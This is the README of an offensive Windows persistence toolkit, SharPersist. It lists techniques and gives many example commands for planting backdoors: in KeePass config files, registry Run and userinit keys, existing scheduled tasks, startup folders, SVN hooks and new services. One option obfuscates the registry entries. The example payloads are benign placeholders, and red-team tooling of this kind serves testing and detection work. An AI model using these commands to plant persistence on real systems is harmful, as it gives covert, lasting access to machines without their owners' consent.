SharPersist

Windows persistence toolkit written in C#. For detailed usage information on each technique, see the Wiki.

Author - Brett Hawkins (@h4wkst3r)

Release

• Public version 1.0.1 of SharPersist can be found in the Releases section

Installation/Building

Pre-Compiled

• Use the pre-compiled binary in the Releases section

Building Yourself

Take the below steps to setup Visual Studio in order to compile the project yourself. This requires a couple of .NET libraries that can be installed from the NuGet package manager.

Libraries Used

The below 3rd party libraries are used in this project.

Library	URL	License
TaskScheduler	https://github.com/dahall/TaskScheduler	MIT License
Fody	https://github.com/Fody/Fody	MIT License

Steps to Build

• Load the Visual Studio project up and go to "Tools" --> "NuGet Package Manager" --> "Package Manager Settings"
• Go to "NuGet Package Manager" --> "Package Sources"
• Add a package source with the URL "https://api.nuget.org/v3/index.json"
• Install the Costura.Fody NuGet package. The older version of Costura.Fody (3.3.3) is needed, so that you do not need Visual Studio 2019.
  • Install-Package Costura.Fody -Version 3.3.3
• Install the TaskScheduler package
  • Install-Package TaskScheduler -Version 2.8.11
• You can now build the project yourself!

Arguments/Options

• -t - persistence technique
• -c - command to execute
• -a - arguments to command to execute (if applicable)
• -w - working directory for the command to execute in (note: only implemented for -t schtask -m add). Useful for DLL Sideloading (AppDomain manager sideloading, ClickOnce deployments)
• -f - the file to create/modify
• -k - registry key to create/modify
• -v - registry value to create/modify
• -n - scheduled task name or service name
• -m - method (add, remove, check, list)
• -o - optional add-ons
• -h - help page

Persistence Techniques (-t)

• keepass - backdoor keepass config file
• reg - registry key addition/modification
• schtaskbackdoor - backdoor scheduled task by adding an additional action to it
• startupfolder - lnk file in startup folder
• tortoisesvn - tortoise svn hook script
• service - create new windows service
• schtask - create new scheduled task

Methods (-m)

• add - add persistence technique
• remove - remove persistence technique
• check - perform dry-run of persistence technique
• list - list current entries for persistence technique

Optional Add-Ons (-o)

• env - optional add-on for env variable obfuscation for registry
• hourly - optional add-on for schtask frequency
• daily - optional add-on for schtask frequency
• logon - optional add-on for schtask frequency

Registry Keys (-k)

• hklmrun
• hklmrunonce
• hklmrunonceex
• hkcurun
• hkcurunonce
• logonscript
• stickynotes
• userinit

Examples

Adding Persistence Triggers (Add)

KeePass

SharPersist -t keepass -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "C:\Users\username\AppData\Roaming\KeePass\KeePass.config.xml" -m add

Registry

SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m add

SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m add -o env

SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "logonscript" -m add

Scheduled Task Backdoor

SharPersist -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Something Cool" -m add

Startup Folder

SharPersist -t startupfolder -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "Some File" -m add

Tortoise SVN

SharPersist -t tortoisesvn -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -m add

Windows Service

SharPersist -t service -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Service" -m add

Scheduled Task

SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c echo 123 >> c:\123.txt" -n "Some Task" -m add

SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c echo 123 >> c:\123.txt" -n "Some Task" -m add -o hourly

SharPersist.exe -t schtask -c "UserControlTestContainer.exe" -w "C:\Users\User\AppData\Local\Apps\2.0\7L6MQ7GB.RL5\DD8W7MRN.455\ssprv2.app_0000000000000000_0001.0000_6a46e5a08e763543" -n "SSPRv2" -m add -o hourly

Removing Persistence Triggers (Remove)

KeePass

SharPersist -t keepass -f "C:\Users\username\AppData\Roaming\KeePass\KeePass.config.xml" -m remove

Registry

SharPersist -t reg -k "hkcurun" -v "Test Stuff" -m remove

SharPersist -t reg -k "hkcurun" -v "Test Stuff" -m remove -o env

SharPersist -t reg -k "logonscript" -m remove

Scheduled Task Backdoor

SharPersist -t schtaskbackdoor -n "Something Cool" -m remove

Startup Folder

SharPersist -t startupfolder -f "Some File" -m remove

Tortoise SVN

SharPersist -t tortoisesvn -m remove

Windows Service

SharPersist -t service -n "Some Service" -m remove

Scheduled Task

SharPersist -t schtask -n "Some Task" -m remove

Perform Dry Run of Persistence Trigger (Check)

KeePass

SharPersist -t keepass -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "C:\Users\username\AppData\Roaming\KeePass\KeePass.config.xml" -m check

Registry

SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m check

SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m check -o env

SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "logonscript" -m check

Scheduled Task Backdoor

SharPersist -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Something Cool" -m check

Startup Folder

SharPersist -t startupfolder -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "Some File" -m check

Tortoise SVN

SharPersist -t tortoisesvn -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -m check

Windows Service

SharPersist -t service -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Service" -m check

Scheduled Task

SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c echo 123 >> c:\123.txt" -n "Some Task" -m check

SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c echo 123 >> c:\123.txt" -n "Some Task" -m check -o hourly

List Persistence Trigger Entries (List)

Registry

SharPersist -t reg -k "hkcurun" -m list

Scheduled Task Backdoor

SharPersist -t schtaskbackdoor -m list

SharPersist -t schtaskbackdoor -m list -n "Some Task"

SharPersist -t schtaskbackdoor -m list -o logon

Startup Folder

SharPersist -t startupfolder -m list

Windows Service

SharPersist -t service -m list

SharPersist -t service -m list -n "Some Service"

Scheduled Task

SharPersist -t schtask -m list

SharPersist -t schtask -m list -n "Some Task"

SharPersist -t schtask -m list -o logon

Warning

Disclaimer: This repository, including all code, scripts, and documentation contained herein, is provided by NVISO exclusively for educational and informational purposes. The contents of this repository are intended to be used solely as a learning resource. The authors of this repository expressly disclaim any responsibility for any misuse or unintended application of the tools, code, or information provided within this repository.

Users are solely responsible for ensuring that their use of the repository complies with applicable laws and regulations. The authors of this repository do not provide any warranties or guarantees regarding the accuracy, completeness, or suitability of the contents for any particular purpose.

If you do not agree with these terms, you are advised not to use or access this repository.